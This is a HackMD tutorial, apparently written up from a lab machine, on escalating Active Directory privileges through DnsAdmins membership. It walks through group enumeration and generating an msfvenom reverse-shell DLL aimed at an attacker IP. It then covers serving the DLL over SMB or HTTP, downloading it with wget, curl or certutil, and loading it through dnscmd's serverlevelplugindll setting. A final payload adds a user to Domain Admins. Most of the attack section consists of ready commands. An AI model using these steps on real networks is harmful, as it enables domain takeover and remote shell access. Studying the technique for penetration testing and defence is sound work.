Try   HackMD

Description

Users who are members of the group DnsAdmins have the ability to abuse a feature in the Microsoft DNS management protocol to make the DNS server load any specified DLL. The service which in turn, executes the DLL is performed in the context of SYSTEM and could be used on a Domain Controller (Where DNS is usually running from) to gain Domain Administrator privileges.

When can it be abused?

Once in an AD environment you can check for the user who is in the group DnsAdmin or Alias DnsAdmin with the commands:

net user <username> /domain
Get-ADGroupMember -Identity "DnsAdmins"
# only if you have access as the user you are enumerating
whoami /groups

If the output is as follows :

*Evil-WinRM* PS C:\Users\ryan\Desktop> Get-ADGroupMember -Identity "DnsAdmins"


distinguishedName : CN=Contractors,OU=Groups,DC=megabank,DC=local
name              : Contractors
objectClass       : group
objectGUID        : 9f2ff7be-f805-491f-aff1-3653653874d7
SamAccountName    : Contractors
SID               : S-1-5-21-1392959593-3013219662-3596683436-1103

or

*Evil-WinRM* PS C:\Users\ryan\Desktop> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

Then you can abuse this privilege!

How can it be abused?

Creating the DLL with MSFVenom

Using metasploit "msfvenom" to create a malicious dll that will return a reverse shell with the command:

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.10.14.12 LPORT=1337 -f dll > pew.dll

Delivering the DLL

There are multiple ways for this stage, you can either host it in your SMBServer, Python HTTP server, or if you have shell in evil-winrm you can just upload the file.

SMB Server

Using the impacket scripts, impacket-smbserver you can run your server with a named share and test if you can reach it. Then from the target's host you can use net view to connect and grab the DLL.

~ $ sudo impacket-smbserver testshare /home/kali/Desktop/test

you can then test if it's up with the command:

~ $ smbclient -L //10.10.14.12/ -N

Replace 10.10.14.12 with your smb server IP. To test if the target is able to access your share you can run the command:

PS C:\> net view \\10.10.14.12
Python HTTP Server

With python http.server module you can host the DLL file and download it in the target's machine using common utilities.

HOSTING

~ $ sudo python3 -m http.server 80

DOWNLOADING

wget http://10.10.14.12/pew.dll curl http://10.10.14.12/pew.dll -OutFile pew.dll certutil.exe -urlcache -f http://10.10.14.12/pew.exe pew.exe
Evil-WinRM

Just run the command upload /path/to/pew.dll

*Evil-WinRM* PS C:\Users\ryan\Desktop> upload /home/kali/Desktop/test/pew.dll
Info: Uploading pew.dll to C:\Users\ryan\Desktop\pew.dll

                                                             
Data: 12288 bytes of 12288 bytes copied

Info: Upload successful!

Execution

We now inject the DLL in dnscmd executable using the command:

dnscmd <FQDN of DC> /config /serverlevelplugindll /path/to/pew.dll
*Evil-WinRM* PS C:\Users\ryan\Desktop> dnscmd test.vulnerable.local /config /serverlevelplugindll C:\Users\ryan\Desktop\pew.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

Now that the DLL is added successfully the next thing is to restart the dns server to trigger the DLL in returning a reverse shell.

sc.exe stop dns
sc.exe start dns

This should trigger a reverse shell as administrator!

ALTERNATIVE EXECUTION

Alternatively if the reverse shell is too much, you can just create a DLL that will add the user you have access to the Domain Admins group. Below is the command to creaate the DLL:

msfvenom -p windows/x64/exec cmd='net group "Domain Admins" <user> /add /domain' --platform windows -f dll > pew.dll

I then upload it to the target's host! And attempt to execute it!